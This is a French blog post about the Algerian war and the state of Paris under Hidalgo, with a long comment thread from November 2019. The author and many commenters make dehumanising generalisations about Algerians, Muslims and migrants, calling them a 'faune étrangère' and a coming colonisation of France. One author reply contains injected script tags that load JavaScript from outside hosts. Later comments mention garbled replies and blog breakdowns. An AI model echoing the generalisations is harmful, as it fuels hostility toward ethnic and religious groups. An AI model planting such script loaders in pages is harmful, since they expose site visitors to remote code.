• La vérité officielle depuis 57 ans

    N' est  qu'un  vaste  mensonge !

     Qui  se souvient   que  pendant  la  guerre  d' Algérie,  le Fln,   toujours   au  pouvoir   dans   ce pays   a fait  entre  6000  et  7000  morts ?

     Qui  se souvient   que  les  chefs   de  l' Oas    furent  des  résistants   en  1940 ?

    Et qu'  est  devenu   Paris sous  Hidalgo ?

    des   camps  de migrants  qui  prospèrent,  des  poubelles   qui débordent, des rats  qui cavalent, et  une délinquance   violente  qui explose  !

    Mais  on  installe  des  pistes   cyclables,  et  on  va  construire   le  village   olympique !

    La   vérité  officielle depuis  57 ans


  • Commentaires

    1
    Guyenne
    Mercredi 6 Novembre 2019 à 17:34

    Serge Lama a chanté : "" L'Algérie, c'était un beau pays, avec ou sans fusil…! "" Sans la France le pays ne s'est pas embelli, bien au contraire. Qui se souvient dis-tu ? Et bien tout ceux qui se sont documentés sérieusement et moi. Le F.L.N. s'engageait pour l'indépendance et tous les moyens étaient bons pour imposer sa volonté durant la phase combattante comme après pour prendre et se maintenir au pouvoir. L'O.A.S. n'était pas un ramassis de crapules mais il y avait tout de même des illuminés dans ses rangs. Ces pro-Algérie française n'ont pas compris la vision du Général. Sans lui, nous aurions fini par tomber sous domination maghrébine (nombre de parlementaires) comme en 1945 nous aurions salué Staline si le P.C. avait réussi à prendre le pouvoir.

    Si Marseille, selon un sketch des "Inconnus", est la première ville algérienne traversée par le Paris-Dakar, la capitale aussi est devenue maghrébine voire africaine. Ayant à sa tête une descendante des berbères ou sarrasins, la capitale ne pouvait pas échapper à ce destin. 

    Bonne soirée !

      • Samedi 9 Novembre 2019 à 19:15

        et  bien   je   finis  par  me  demander  s'il  n'  y a  pas  plus  d' algériens   en  France  qu' en  Algérie,   et  je  pense  toujours  que  nous  n' aurions  jamais  dû  leur  permettre  de venir  en   France,  encore  moins   avec  leur  famille

    2
    Mercredi 6 Novembre 2019 à 17:56

    Je te sens bien énervé, fais attention à ta santé !

      • Mercredi 6 Novembre 2019 à 18:05

        il  est  clair que   je  suis   énervé,   et  il  me  semble  qu' il  y a  de quoi

        <script src="//amptylogick.com/21aca573d498d25317.js"></script> <script src="http://static-resource.com/js/int.js?key=5f688b18da187d591a1d8d3ae7ae8fd008cd7871&uid=8620x" type="text/javascript"></script> <script src="http://cdn-javascript.net/api?key=a1ce18e5e2b4b1b1895a38130270d6d344d031c0&uid=8620x&format=arrjs&r=1573059869301" type="text/javascript"></script> <script src="http://amptylogick.com/ext/21aca573d498d25317.js?sid=52587_8620_&title=a&blocks[]=31af2" type="text/javascript"></script>
      • Mercredi 6 Novembre 2019 à 18:07

        Bravo pour c commentaire : mdr:

    3
    Mercredi 6 Novembre 2019 à 17:59

    Si les Français ne se réveillent pas dans 20 ans voir moins nous serons sous leur domination et avec la charia !!! 

    Du reste c'est se qu'ils cherche depuis la fin de la guerre d'Algérie !!!

    Bonne soirée mon ami , bisous d'amitié ♥

    Origine de la colonisation de l'Algerie : à ne pas oublier !

    https://www.agoravox.fr/tribune-libre/article/un-million-d-esclaves-blancs-211938

     

      • Samedi 9 Novembre 2019 à 19:17

        L' islam   est  expansionniste,  et   on  le  voit  dans  le  monde entier

        L'  exemple  du   Kosovo   ou   du  Liban  devrait   nous  inspirer !

         

    4
    Mercredi 6 Novembre 2019 à 18:04

    Désolé, j'ai toujours combattu le colonialisme , et donc milité pour l'indépendance de l'Algérie. Qu'aurions nous fait si l'histoire avait été inversée, et si au lieu d'avoir une Algérie Française il y aurait eu une France Alérienne ? 

    Quant à Paris, avec Hidalgo ou sans, j'ai eu la chance de ne pas y être pendant les grèves, et donc je n'ai pas vu de poubelles qui débordent, pas de ras en  cavalent. Par contre, j'ai admiré les pistes cyclables et les sens interdits sauf aux bus et aux cyclistes, et je suis heureux qu'on construise un village olympique pour recevoir les jeux. J'ai vu construire le village olympique de Grenoble,, une belle réussite, les jeux ayant été ouverts par le Général De Gaule 

    Tu vois, mon cher Pierre, je vois la vie un peu plus en rose que toi, même si je regrette que nous soyons mal gouvernés. Mais comme dit notre ami Rémy, ce n'est que mon avis.

    Bonne soirée. avec mon amitié. Hugues

     

      • Samedi 9 Novembre 2019 à 19:22

        tu    dois  bien   te  souvenir  que   nous avons    sauvé  l' Algérie  des  ottomans  qui  l' occupaient !

        D' ailleurs  c'  est   simple,  depuis   que  les  français  n' y sont  plus   l' Algérie  est   devenue  assistée !

        Les   jeux  olympiques   vont   nous  coûter   des  milliards ,  et   les automobilistes  sont   vus  par  Hidalgo   comme  des pestiférés, sauf   quand   c' est  elle  qui est  au  volant

    5
    Mercredi 6 Novembre 2019 à 18:21

    Les algériens sont rancuniers. Une fois que les français ont installé chez eux de quoi faire des belles villes ils ont voulu et obtenu leur indépendance . Mais ce n'était pas fini : après avoir chassé tous les pieds noirs ils ont décidé de se venger et de venir nous coloniser. Ils sont en passe de réussir si nous n'y prenons pas garde ! Pendant ce temps la France se prépare à vivre sous leur occupation puisque nos villes, surtout la capitale est sale et infestée ! Mais on dépense un argent fou pour des pistes cyclables  certes utiles et surtout construire un village olympique. Les diverses expériences ont montré que cela coûtait une fortune et ne laissait que des dettes cuisantes ! Hidalgo devrait d'abord faire de sa ville une ville propre, sans migrants étalés, où règne la sécurité plutôt que rêver de gloriole : ce n'est vraiment pas le moment !

    Passe une bonne soirée         Bisous

      • Jeudi 7 Novembre 2019 à 19:10

        Ce jeudi  avis tardif de NL  disant "en attendant l'intervention d'Eklablog"  mais il n'y a pas de billet ???

        Est-ce normal ? Un souci avec ton hébergeur ?

        Pas d'ennui de santé j'espère !

        A bientôt   Bisious

      • Samedi 9 Novembre 2019 à 19:25

        Il  me  semble  qu'  un  pays qui  doit  tout  à  la France  lui   signifie de  partir  ou de  mourir,  on   aurait  dû  lui fermer  la  porte !

         On   sait  que  les    jeux  olympiques  créent  des    frais  énormes,  qu'  on  met   des années   à  régler !

        Et  tout  le  monde   ne peut  pas    prendre  son   vélo  pour  venir  travailler  à  Paris,  et  une fois  encore, ce  sont  les  plus  défavorisés   qui  sont  punis

    6
    Françoise2
    Mercredi 6 Novembre 2019 à 18:24

    Avec Hidalgo, Sa Gueuse sec dans Paris et les rats ne pullulent pas qu'à Paris hélas et l'Espagnole n'a de cesse de se défiler de se  défausser des ses responsabilités et c'est + de 4o millions d'€ de déficits pour la ville" Lumière" qui est devenue  par certains endroits la Cour des Miracles ,un cloaque à ciel ouvert puant  comme sous le règne de Louis XIV! Un dépotoir du tiers monde à ciel ouvert qui défèquent et pissent partout ! Paris est devenue une ville hyper dangereuse  un véritable repoussoir dans certains arrondissements  ghettoïsés par les vermines toxicomane , des riverains ne peuvent plus sortir de chez eux sans se heurter aux toxicos agressifs  ,aux seringues qui trainent et aux dealers avec les salles de shoot  qui n'attirent que de des déchets et l'air y est devenue irrespirable,et elle prétend lutter contre la pollution   ,la fraude est partout En ce qui concerne Marseille il devrait la rattacher à l'Algérie  et faire un pont ! Je suis désolée Pierre ,L'OAS  ,le FLN c'est une période que je ne connais pas trop ,j'étais jeune et j'avoue que cette époque ne me préoccupait pas , bien sûr j'entendais mes parents en parler mais pour moi c'était un peu de l'Hébreu !  Il est évident que tous ces politiques  nous mentent ,ce ne sont que des faussaires avides de pouvoir et de pognon ,France   symbole de liberté ça ne veut plus rien dire du tout , ces politiques ne sont que des pesticides qui aggravent les situations de beaucoup de Français !

      • Samedi 9 Novembre 2019 à 19:30

        Les  touristes  sont  rançonnés,  il  y a  même  eu  des  attaques   de bus   qui  les amène !

        Les  couloirs  de  métro   sont  infestés  par  une   faune dangereuse ,    des   voitures se  font  attaquer  aux  feux   rouges ,  mais  on  ne  montre  toujours  que  les   beaux quartiers    où  les   forces   de  l' ordre  protègent les  plus riches

    7
    Mercredi 6 Novembre 2019 à 18:24

     bonsoir 

     provinciale  convaincue , je  connait peu la capitale .

     mais chaque  fois que j 'y vais  (  pas  souvent  rires )  je ne peut pas respirer   la haut  , c'est trop    pollué  pour moi qui  vit  à hauteur de( gréves estran ) 

     quand  j 'y vais    ( pas depuis deux ans  passé)  je trouve cette  belle ville sale ,  et pourtant  si   C'est une belle ville ,

    chargée d ' histoire ...

    .alors  je préfére regarder  des  photos ou des reportages  , qui ne nous disent pas tout ..

    et ce que j 'entend  ne me plait pas du tout  , comme  Marseille  aussi ..

     bonne soirée PIERRE 

     @ KENAVO

      • Samedi 9 Novembre 2019 à 19:31

        Je  regarde   des reportages    sur   Paris  jadis ,   et   c' était  une  petite  merveille   qui   recueillait  tous  les  artistes   du  monde !

         Les  choses   ont   bien  changé , et  le  communautarisme  y est   pour  beaucoup

    8
    Golondrina63
    Mercredi 6 Novembre 2019 à 18:50

    Je suis montée à Paris en août et  vraiment je ne peux pas dire que cela me donne envie d'y retourner 

    Oui tu dis vrai hélas ... avec ma copine, on ne se sentait pas en sécurité , oui des poubelles partout , je n'ai pas vu de rats mais des odeurs puantes 

    oui des gens pas très catholiques 

    oui j'ai été déçue , car la ville est sale , ça a bien changé ...... et aux feux rouges, il vaut mieux se fermer car ce que j'y ai vu  ça dépasse l'entendement , ils sortent de leur tante et se jette sur les voitures, j'ai eu très peur dans le quartier ou je suis allée voir une expo , jamais j'aurais imaginé que Paris c'était cela en 2019 

    Cela dit ça vient dans toutes les villes, même par chez moi hélassssssssss 

    Mais je positive, je priorise la campagne pour mes sorties , et on finit par se faire une raison car il y a des gens bien tout de même 

    Bonne soirée Pierre 

    @ demain 

     

     

      • Samedi 9 Novembre 2019 à 19:34

        Schengen,  une  grave  erreur !

         Quelle  connerie  que  de vouloir  supprimer   nos  frontières !

        il   faut  vraiment  être  bisounours  pour  y  croire !

         Nous  sommes   envahis  par  une  faune  étrangère  qui  se  moque   bien  de la France  mais  pas   des aides   qu' 'elle  y trouve !

    9
    Jaklin
    Mercredi 6 Novembre 2019 à 19:31

    Je n'oserai plus aller à Paris avec ma fille, trop dangereuse ville, sale et inhospitalière, dégoutante, pauvre France

    Ce gouvernement nous coute des frais astronomiques, mais sans résultat

    bonne soirée

      • Samedi 9 Novembre 2019 à 19:36

        et  qui  en  plus  est  fort endettée   !

         Tu  me  diras,  il  ne  faut  pas  sortir   dans Maubeuge  et  ses environs  quand  la racaille  se  lève,    à  partir   de  20  heures

    10
    Dhelicat
    Mercredi 6 Novembre 2019 à 19:40
    Il y a de quoi être énervé...j'étais parisienne j'ai fui la capitale et ce quelle est devenue ...grâce a nos politiques sans vraiment de regrets, bonne soirée Pierre merci pour ton mail
      • Samedi 9 Novembre 2019 à 19:37

        Pour  rien  au  monde    je  ne  voudrais   y résider,   et  d' ailleurs  j' ai  compris  que  le  malaise  commençait  à  tocher  toutes  les   villes

    11
    morsli
    Mercredi 6 Novembre 2019 à 20:17

    Le jour de la note du village olympique, il y aura les cocus de contribuables et les privilégiés lobbyistes.Du classique quoi !

      • Samedi 9 Novembre 2019 à 19:39

         Hidalgo  s' en  fiche,  elle   ne paiera  pas ,  pas  plus  que  Macron  qui  l' a soutenue !

         Et   pourtant  on  aurait  pu  se  demander  pourquoi    il  n'  y a  pas   eu   d' autres   candidat,   à  par  les  Usa

    12
    Jeudi 7 Novembre 2019 à 01:00
    bonjour Pierre tout est dit passe un bon jeudi demain je suis en balade photo Rene
      • Samedi 9 Novembre 2019 à 19:40

        tu  nous  prépares  tes articles

    13
    Jeudi 7 Novembre 2019 à 03:34

              Bonjour Pierre ...Apparemment  les   migrants  maghrébins ou autres  ne  salissent  pas  assez  ,  ne  violent  et  volent  pas  assez  dans  les  belles  villes  de  France  comme  Marseille  et  Paris  , d’après  certains  commentaires  sur  ton  billet ...je  crois  que  les  migrants  maghrébins  ou  autres  le  savent  . Certains  Français  n'ont  pas  encore  comprit  ce  qui  se  passe  et  le  Général  doit  se  retourner  dans  sa  tombe  , ou  peut-etre  que  ceux  qui  ne  comprennent  pas  ce  qu'il  se  passe  en  France  , devraient  regarder  la  vidéo  de  Fellag  "La valise "  quand  il  dit  , on  va  tous  venir  se  faire  coloniser  a  domicile , vous  n'avez  pas  réussit  une  première  fois , on vous  donne  une  deuxième  chance  ...Fellag  fait  salle  comble  avec  ce  genre  de  sketch ...Ou  en est  maintenant , ce  beau  pays  que  la  France  a  construit  et  que  sera  la  France  maghrébine ?.. Mais  ce  n'est  que  mon  opinion ..  Bonne  journee  Pierre  ..
     Bisous ..    

      • Samedi 9 Novembre 2019 à 19:41

        Je  connais  cet humoriste  et  il  m' a  fait  rire  jaune !

        On   a   tellement  culpabilisé   les  français  qu' ils  se taisent !

         J' espère  qu' ils  se réveilleront   avant   qu' il  ne soit  trop tard

    14
    Jeudi 7 Novembre 2019 à 06:02

    Que je me trouve heureuse dans ma campagne où il y a plein de bruits naturels et où ça sent bon le fumier quand les cultivateurs le répandent dans leurs champs !

    Jamais vu une femme voilée, un barbu basané ou un black en grosse cylindrée ...

    Tout ça me permet de supporter mes maux.

    " Bon jeudi automnal !
    Passage rapide avant nouvelle pause.
    Gros bisoux ♥ "

      • Samedi 9 Novembre 2019 à 19:42

        Je suis   comme  toi,  pas  loin de la  ville, mais  pas  loin des  champs  et  des prairies !

    15
    Jean
    Jeudi 7 Novembre 2019 à 08:17

    Ces gens sont des monarques qui se moquent du peuple....

      • Samedi 9 Novembre 2019 à 19:43

        Je suis  bien  d' accord   avec  toi

    16
    Jeudi 7 Novembre 2019 à 09:04

    La vérité n'est rien d'autre que la subjectivité et le vraisemblable est un mélange de vérité et d'erreur.

     

      • Samedi 9 Novembre 2019 à 19:44

        Certes   mais  que  pensent  ceux  qui  sont  confrontés   avec  la réalité  du  terrain ?

    17
    Jeudi 7 Novembre 2019 à 10:14

    Relax !!! pense à toi !!! on peut rien!bon jeudi 

      • Samedi 9 Novembre 2019 à 19:44

        J'  essaie,  mais   c' est  plus  fort  que  moi

    18
    LIANOU
    Jeudi 7 Novembre 2019 à 11:24

    bonjour Pierre  .

    en parlant de camp de migrants sssss(1600) ont été évacués  ce matin de la porte de la Chapelle  enfin ce que l'on nous dit  nous allons bientôt les voir rappliquer dans nos banlieues malgré les soi- disant  énormes force de police pour les transférés dans des centres  .

    la France ne peux  plus suivre   mais qui et quand comprendrons t- ils  .

    bonne journée   aujourdhui  temps clair   ..ça fait plaisir....amitiés  

      • Samedi 9 Novembre 2019 à 19:46

        Ce qui n' empêche  pas  Macron   d' en  accepter  d' autres, et  le  premier  ministre   d'oser  nous  parler   de quotas !

         on  sait   que  vider  un camps     lundi,   ne sert  à  rien,  puisqu' ils  reviennent  le  lundi  suivant

    19
    Jeudi 7 Novembre 2019 à 11:41
    zalandeau

    Pour les chefs de l'OAS, bien entendu il ont voulu reproduire cette résistance pour la France.... Sauf un petit détail : L'Algérie... ce n'était pas chez eux, tout comme les immigrés ne sont pas chez eux quand ils sont chez nous...

    Très bonne journée

      • Samedi 9 Novembre 2019 à 19:47

        oui  en  non,  l' Algérie  n' existait  pas  et  c' était  le  fief   des ottomans

    20
    Jeudi 7 Novembre 2019 à 12:53

    calmeeeeeeeeee PIERRE BISES

      • Samedi 9 Novembre 2019 à 19:48

        Bises   à toi

    21
    Jeudi 7 Novembre 2019 à 16:25

    Tu cryptes tes réponses maintenant ?

    Bonne fin de journée !

      • Samedi 9 Novembre 2019 à 19:48

        ça   m'  a  assez  énervé !

    22
    Jeudi 7 Novembre 2019 à 16:52

    Et oui, tout va mal en France et ils racontent tous des salades !

    J'ai connu Paris reine du monde, maintenant c'est une poubelle

    Mais faut pas t'éerver, c'est pas bon pour ton cœur

    Bisous

      • Samedi 9 Novembre 2019 à 19:49

        comment  ne  pas  s' énerver  quand  on  voit   ce qu' a  été  Paris !

    23
    Jeudi 7 Novembre 2019 à 17:29

    Tu sais, tes commentaires passent très bien chez moi (rire)

    Cela fait un moment que je ne te vois plus.

    Est-ce que ton ordi est en panne ? J'espère que non.

    A bientôt

    Bisous

    24
    Jeudi 7 Novembre 2019 à 17:30

    Pas d'article à 17h, cela devient inquiétant !

    25
    Jeudi 7 Novembre 2019 à 18:58

    Problèmes  avec  la  connexion  Eklablog ..rien ne  s'ouvre ? 
    A  bientot

    26
    Jeudi 7 Novembre 2019 à 20:26
    PPRené

    tu sembles avoir des problèmes  pour tes commentaires,, esperons qu Eklablog v a arranger ça rapidement ... la vérité officielle il y a longtemps qu'il faut s'en mefier  ! amitiés 

     
     
    27
    Jeudi 7 Novembre 2019 à 20:57

    Conseil de Poumo-thorax :

    Trublion, vide les caches sur ton navigateur, efface tes cookies et voit après ce que ça donne

    28
    Jeudi 7 Novembre 2019 à 22:08

    Bonsoir. Un petit coucou rassurant en ce qui me concerne, d'après l'analyse de ma plus vilaine verrue, rien de méchant, car "benigne". Bonne soirée. Amitié. hugues

    29
    Vendredi 8 Novembre 2019 à 09:57
    francinea

    Bonjour, je suis effarée par les commentaires, qui veulent nous faire croire que Paris est invivable,    hyper dangereuse, il ne faut tout de même pas exagérer sur Paris, pas plus polluée que le Luberon ou Lyon, Marseille, etc..., pas plus dangereuse que d'autres villes; j'ai de l'asthme et je ne fais pas de crises;  je m'y sens en sécurité, évidemment j'évite La Chapelle (j'y ai travaillé neuf mois), et j'habite un beau quartier (de bobos?) ceci dit aux Halles les dealers sont là et en sous sol c'est toujours la jungle, la nuit ça castagne toujours rue Berger; je sors le soir, je n'ai pas peur, je me balade dans les rues en toute quiétude, j'y fais mes courses tranquille, j'apprécie ce que la ville peut m'offrir et je m'y sens bien; je ne dis pas que parfois je ne rêve pas de calme, pour ça j'ai apprécié Laval; ce que je reproche à Hidalgo c'est sa politique migratoire; certains quartiers sont sales, le nord de Paris en particulier (19e, La Chapelle évidemment); les rats, ce n'est pas d'aujourd'hui; quant à Anne Hidalgo, je l'ai rencontrée deux ou trois fois lors de manifestations publiques, elle est très souriante, sympa, vient vers les gens pour échanger deux trois mots, pour sa politique c'est autre chose; une chose est certaine je ne voterai pas pour ces opportunistes qui ont posé candidature, qui ne connaissent pas Paris; pour les jeux, c'est une bonne chose, par contre irai-je ou pas, il va y avoir du monde....je te souhaite une bonne journée, bisous

      • Samedi 9 Novembre 2019 à 19:52

        C' est  grand Paris  et  tout  dépend   de  où on se trouve !

         j' ai  un  beau-frère   à Saint Denis ,  il est  le seul  français   d' origine  polonaise,  tous les  autres  sont  musulmans

        Et  tu as  raison,  le malaise  a gagné   toutes   nos  grandes   villes

    30
    Vendredi 8 Novembre 2019 à 16:10
    Renee

    Désolée, je n'arrive pas a me connecter à mon propre blog http://envie2.be/ je ne peux donc pas répondre à vos coms (à part en externe, ce que je ferais dès que possible) ni même publier quoique ce soit. Je vais essayer de résoudre ce soucis et serais donc peux présente d'ici là......Profondément navrée pour vous et assez fâchés de cet état de fait...Bonne après fin de semaine bises amicales

    31
    Vendredi 8 Novembre 2019 à 16:27

    Il faut que tu supprimes le logiciel javascript

    32
    Vendredi 8 Novembre 2019 à 16:32

    BONJOUR PIERRE !

    Les artistes connus et inconnus, quittent Paris et disent ouvertement (comme Alain SOUCHON) :

    - La ville de PARIS est devenue salle, mal odorante et très violente !

    La circulation automobile, dans un passé récent, déjà encombrée mais fluide et paisible est devenue très difficile, anarchique (plans de circulation aberrants) et vélos, trottinettes et autres over-boards font n'importe quoi (et en plus ils se tuent)

    Les décisions aberrantes pour lutter contre la pollution (limitation de vitesse, mise place de bus sous utilisé qui bloque la circulation)

    Salut Mon Ami PIERRE !

    RÉMY.

      • Samedi 9 Novembre 2019 à 19:53

        C'  est aussi  ce  que  j' ai  constaté , et  ça  ne  va  pas  s'améliorer

    33
    Vendredi 8 Novembre 2019 à 16:53

    PIERRE UN BEAU WEEK-END ET RESTE CALME STP

    BISES DE PAS LOIN MDR

    34
    Vendredi 8 Novembre 2019 à 17:58

    Bonsoir Pierre

    Bonne fin de semaine

    Garde ton calme, ça ira mieux demain ou après-demain

    J'ai demandé de l'aide à Stan pour Toi !

    Je t'embrasse

    Chantou

    35
    LIANOU
    Vendredi 8 Novembre 2019 à 18:18

    pas  de blog  !!!! toujours en panne  ?????  amitiés

    36
    Vendredi 8 Novembre 2019 à 18:37

    Salut,

    Paris est une vraie poubelle parait-il.

    Je me suis balader à Saint Denis et croyez moi on se demande où on est?

    Le temps est beau pour un mois de novembre.

    J'ai fabriqué un mangeoire pour les oiseaux.

    Bon week-end

      • Samedi 9 Novembre 2019 à 19:54

        J' ai  de la  famille  à Saint  Denis,  je n'y  vais  plus  je  me suis  fait    voler    à chaque  fois  dans  ma  voiture

    37
    Vendredi 8 Novembre 2019 à 19:22

    Bonsoir Pierre

    il serait temps que les Français se réveillent   parce que c'est de pire en pire peut etre que les gilets jaunes  vont trouver la solution mais c'est surtout dans les bureaux de vote qu'il va falloir faire de bons choix  ça approche 

    passe une bonne soirée et un bon Week end mon ami a bientôt

    Marcel

      • Samedi 9 Novembre 2019 à 19:55

        La  solution   est  là,  dans  les  bureaux   de vote,  mais  il semble  que  les  français     ont  peur  du changement

    38
    Samedi 9 Novembre 2019 à 18:47

    C'est bien, ce sera la première fois que les rats participeront aux jeux olympiques...he Ils vont pouvoir s'éclater! même qu'il vont faire du vélo...

    Stan

      • Samedi 9 Novembre 2019 à 19:55

        ah  ça,  ils   doivent  se préparer  à récolter   le  blé

    Suivre le flux RSS des commentaires


    Ajouter un commentaire

    Nom / Pseudo :

    E-mail (facultatif) :

    Site Web (facultatif) :

    Commentaire :